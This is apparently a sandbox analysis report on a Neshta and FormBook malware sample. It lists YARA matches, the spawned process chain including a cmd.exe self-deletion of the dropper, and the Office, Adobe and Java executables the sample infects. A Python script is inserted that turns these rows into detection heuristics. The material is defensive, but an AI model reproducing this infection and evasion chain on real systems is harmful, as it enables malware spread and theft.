          Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.svchost.com.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: classification engine, Classification label: mal100.spre.troj.evad.winEXE@15/122@1/1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, Code function: 2_2_004041CD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, Code function: 2_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, File created: C:\Users\user\AppData\Roaming\hbqilrp
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_01
          Source: C:\Windows\svchost.com, Mutant created: \Sessions\1\BaseNamedObjects\MutexPolesskayaGlush*.* svchost.com n X . t N t h ` T 5 @
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, File created: C:\Users\user\AppData\Local\Temp\3582-490
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: vi0EwpbUht.exe, Metadefender: Detection: 91%
          Source: vi0EwpbUht.exe, ReversingLabs: Detection: 100%
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, File read: C:\Users\user\Desktop\vi0EwpbUht.exe
          Source: unknown, Process created: C:\Users\user\Desktop\vi0EwpbUht.exe 'C:\Users\user\Desktop\vi0EwpbUht.exe'
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, Process created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, Process created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\svchost.com 'C:\Windows\svchost.com' 'C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe'
          Source: C:\Windows\svchost.com, Process created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe, Process created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
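The process-creation rows above describe two chains worth recognising from telemetry: the Neshta stub C:\Windows\svchost.com launching the real target named on its command line, and the FormBook stage where explorer.exe starts an argument-less system tool (NETSTAT.EXE, help.exe) that then runs cmd.exe /c del against the dropper. The script below is an added example, not Joe Sandbox code or output: it rebuilds the process tree from rows in the form shown above and applies four heuristics of my own. The rows are constructed from this report; the heuristics are assumptions about what a detection engineer would key on, not rules the sandbox uses.

```python
import re
from collections import Counter, defaultdict

# Constructed input: the "Process created" rows of this report, one per line.
REPORT_LINES = r"""
Source: unknown, Process created: C:\Users\user\Desktop\vi0EwpbUht.exe 'C:\Users\user\Desktop\vi0EwpbUht.exe'
Source: C:\Users\user\Desktop\vi0EwpbUht.exe, Process created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, Process created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
Source: C:\Windows\explorer.exe, Process created: C:\Windows\svchost.com 'C:\Windows\svchost.com' 'C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe'
Source: C:\Windows\svchost.com, Process created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe, Process created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
"""

LINE_RE = re.compile(
    r"^Source: (?P<parent>.+?),? Process created: (?P<image>\S+)(?: (?P<cmdline>.*))?$"
)
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def dirname(path):
    return path.rsplit("\\", 1)[0].lower()


def parse_tree(text):
    """Map parent image -> [(child image, command line)], exact duplicate rows dropped."""
    tree = defaultdict(list)
    for raw in text.strip().splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        edge = (m["image"], m["cmdline"] or "")
        if edge not in tree[m["parent"]]:
            tree[m["parent"]].append(edge)
    return tree


def roots(tree):
    """Parents that never appear as a child (here the pseudo-parent 'unknown' and explorer.exe)."""
    children = {child for kids in tree.values() for child, _ in kids}
    return [parent for parent in tree if parent not in children]


def render(tree, node, depth=0, out=None):
    """Indented listing of the subtree below node; a self-relaunch is listed once, not recursed."""
    out = [] if out is None else out
    for child, cmdline in tree.get(node, []):
        out.append("  " * depth + f"{basename(child)}  {cmdline}")
        if child != node:
            render(tree, child, depth + 1, out)
    return out


def find_indicators(tree):
    """Heuristics (assumed, my own) for the launch chain seen in this report."""
    findings = []
    for parent, children in tree.items():
        for child, cmdline in children:
            # Neshta stub: C:\Windows\svchost.com is not a Windows binary; it launches
            # whatever target is named on its command line.
            if basename(parent) == "svchost.com" and dirname(parent) == "c:\\windows":
                findings.append(("neshta_launcher", parent, child))
            # A process relaunching its own image with the same command line: the child
            # is the usual host for a hollowed (replaced) payload.
            if child.lower() == parent.lower():
                findings.append(("self_relaunch", parent, child))
            # explorer.exe starting a system console tool with no arguments at all.
            if (basename(parent) == "explorer.exe" and dirname(child) in SYSTEM_DIRS
                    and cmdline.strip("'").lower() == child.lower()):
                findings.append(("explorer_spawns_system_tool", parent, child))
            # A system tool (not cmd.exe itself) using cmd.exe /c del to remove a file.
            if (basename(child) == "cmd.exe" and "/c del" in cmdline.lower()
                    and dirname(parent) in SYSTEM_DIRS and basename(parent) != "cmd.exe"):
                findings.append(("dropper_cleanup", parent, cmdline))
    return findings


def summarize(findings):
    """Count findings per kind (order-independent)."""
    return dict(Counter(kind for kind, *_ in findings))


if __name__ == "__main__":
    tree = parse_tree(REPORT_LINES)
    for root in roots(tree):
        print(basename(root))
        print("\n".join("  " + line for line in render(tree, root)))
    for kind, where, what in find_indicators(tree):
        print(f"{kind:28} {basename(where)} -> {what}")
```

On this input the script reports one neshta_launcher edge (svchost.com to elxhan.exe), two self-relaunches (the Temp copy of vi0EwpbUht.exe and elxhan.exe), two argument-less tools started by explorer.exe (NETSTAT.EXE, help.exe) and one dropper cleanup. The same four rules map directly onto Sysmon event 1 or EDR process-start telemetry, where parent image, child image and command line are the same three fields.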
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: netstat.pdbGCTL source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: vi0EwpbUht.exe, 00000002.00000003.327241678.0000000003140000.00000004.00000001.sdmp, vi0EwpbUht.exe, 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, elxhan.exe, 00000007.00000002.565127229.0000000000B0F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vi0EwpbUht.exe, elxhan.exe, NETSTAT.EXE, help.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Unpacked PE file: 3.2.vi0EwpbUht.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe | Unpacked PE file: 7.2.elxhan.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe | Code function: 2_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040802C push 00408052h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_004070A4 push 004070D0h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_004041D8 push 00404204h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_004041A0 push 004041CCh; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00404256 push 00404284h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00404258 push 00404284h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00404210 push 0040423Ch; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_004042C8 push 004042F4h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00404290 push 004042BCh; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00404370 push 0040439Ch; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00404300 push 0040432Ch; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00404338 push 00404364h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_004043E0 push 0040440Ch; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_004043A8 push 004043D4h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00410778 push 00406D36h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040D7C0 push 00403D79h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040D9F0 push 00403F84h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040DA28 push 00403FBCh; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00411AC4 push 00408052h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00410B3C push 004070D0h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040DC70 push 00404204h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040DC38 push 004041CCh; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00406CE0 push 00406D36h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040DCEE push 00404284h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040DCF0 push 00404284h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040DCA8 push 0040423Ch; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040DD60 push 004042F4h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_00403D28 push 00403D79h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040DD28 push 004042BCh; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040DDD0 push 00404364h; ret
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | Code function: 1_2_0040DD98 push 0040432Ch; ret

          Persistence and Installation Behavior:

          Yara detected Neshta
          Source: Yara match | File source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara match | File source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
          Drops PE files with a suspicious file extension
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File created: C:\Windows\svchost.com
          Drops executable to a common third party application directory
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File written: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File written: C:\ProgramData\Adobe\ARM\S\1742\AdobeARMHelper.exe
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | File written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
          Source: C:\Windows\svchost.com | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Drops executables to the windows directory (C:\Windows) and starts them
          Source: C:\Windows\explorer.exe | Executable created and started: C:\Windows\svchost.com
          Infects executable files (exe, dll, sys, html)
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe | System file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
          Source: C:\Windows\svchost.com | System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
